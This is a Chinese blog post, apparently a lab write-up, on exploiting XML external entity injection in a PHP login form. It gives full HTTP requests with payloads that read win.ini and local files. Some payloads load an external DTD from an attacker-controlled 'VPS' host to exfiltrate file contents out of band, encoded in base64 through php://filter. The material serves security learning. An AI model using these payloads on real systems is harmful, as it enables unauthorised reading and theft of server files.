xxe-lab学习

admin 2022年3月4日20:17:12评论81 views字数 2875阅读9分35秒阅读模式

xxe-lab学习

xxe:xml外部实体注入,程序在解析xml文件时,引用了不安全的外部实体

环境如下
xxe-lab学习
首先时回显的xxe,测试数据如下
xxe-lab学习

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 63
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/


<user><username>cixin</username><password>1</password></user>

在reponse中msg把输入的username打印出来了可以作为回显位置

接着测试如下

xxe-lab学习

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 162
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY cixin SYSTEM "file:///c://windows/win.ini">
]>
<user><username>&cixin;</username><password>1</password></user>

成功读取到了win.ini文件,接下来利用盲xxe方法来,先尝试能否引用外部dtd文件
首先vps开启http服务,然后发送数据包
xxe-lab学习

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY cixin SYSTEM "http://vps地址/test.dtd">
]>
<user><username>&cixin;</username><password>1</password></user>

xxe-lab学习
可以引用,利用xxer读取文件
github地址:https://github.com/TheTwitchy/xxer
尝试利用file协议读取d盘下的1.txt
xxe-lab学习
修改ftp.dtd.template文件
xxe-lab学习
使用python2启动xxer.py
xxe-lab学习
将生成的payload复制到burp,发包
xxe-lab学习

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 199
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://vps地址/ext.dtd">%aaa;%ccc;%ddd;]>
<user><username>&cixin;</username><password>1</password></user>

成功读取到了1.txt文件内容
xxe-lab学习
再读取win.ini,发现不返回数据
xxe-lab学习
排坑过程
先将能读取到的1.txt修改为两行数据

xxe-lab学习
利用xxe读取,发现读取失败,发现利用file协议读取再往出传值的话遇到换行就失败了,接着使用php伪协议php://filter/read=convert.base64-encode/resource来进行传值

修改dtd文件协议继续尝试
xxe-lab学习

成功读取到编码字符串
xxe-lab学习

xxe-lab学习

再次读取win.ini也是没问题的
xxe-lab学习
xxe-lab学习
总结:php网站的xxe可以使用伪协议进行数据外带,另外也有其他支持外带的协议如下
xxe-lab学习
在测试过程中,有xml数据的时候不妨试一试,可能会有意外收获


原文始发于微信公众号(瓜神学习网络安全):xxe-lab学习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月4日20:17:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xxe-lab学习https://cn-sec.com/archives/814354.html

发表评论

匿名网友 填写信息